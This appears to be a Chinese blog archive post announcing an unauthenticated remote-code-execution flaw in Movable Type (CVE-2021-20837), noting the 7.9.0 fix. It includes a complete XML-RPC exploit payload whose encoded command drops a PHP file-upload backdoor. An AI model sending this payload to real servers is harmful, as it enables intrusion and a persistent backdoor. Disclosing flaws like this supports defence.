December 2021 Archives

Movable Type最近爆雷,攻击者可以通过SOAP协议的methodName中指定mt.handler_to_coderef来执行base64中的内容,如:

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
YGVjaG8gUEQ5d2FIQWdhV1lvSkY5UVQxTlVLWHRwWmloQVkyOXdlU2drWDBaSlRFVlRXeUl3SWwxYkluUnRjRjl1WVcxbElsMHNKRjlHU1V4RlUxc2lNQ0pkV3lKdVlXMWxJbDBwS1h0bFkyaHZJbGtpTzMxbGJITmxlMlZqYUc4aVRpSTdmWDFsYkhObGUyVmphRzhpUEdadmNtMGdiV1YwYUc5a1BYQnZjM1FnWlc1amRIbHdaVDF0ZFd4MGFYQmhjblF2Wm05eWJTMWtZWFJoUGp4cGJuQjFkQ0IwZVhCbFBXWnBiR1VnYm1GdFpUMHdQanhwYm5CMWRDQnVZVzFsUFRBZ2RIbHdaVDF6ZFdKdGFYUWdkbUZzZFdVOWRYQStJanQ5UHo0PSB8IGJhc2U2NCAtZCB8IHRlZSBmaWxlLXVwbG9hZGVyLnBocGA
</base64>
</value>
</param>
</params>
</methodCall>

官方最新版本(v7.9.0)已经修复。

详情见:https://medium.com/@TutorialBoy24/an-unauthenticated-rce-vulnerability-in-movabletype-cve-2021-20837-70664b159dd7

Monthly Archives

Pages

Powered by Movable Type 7.9.0

About this Archive

This page is an archive of entries from December 2021 listed from newest to oldest.

November 2021 is the previous archive.

January 2022 is the next archive.

Find recent content on the main index or look in the archives to find all content.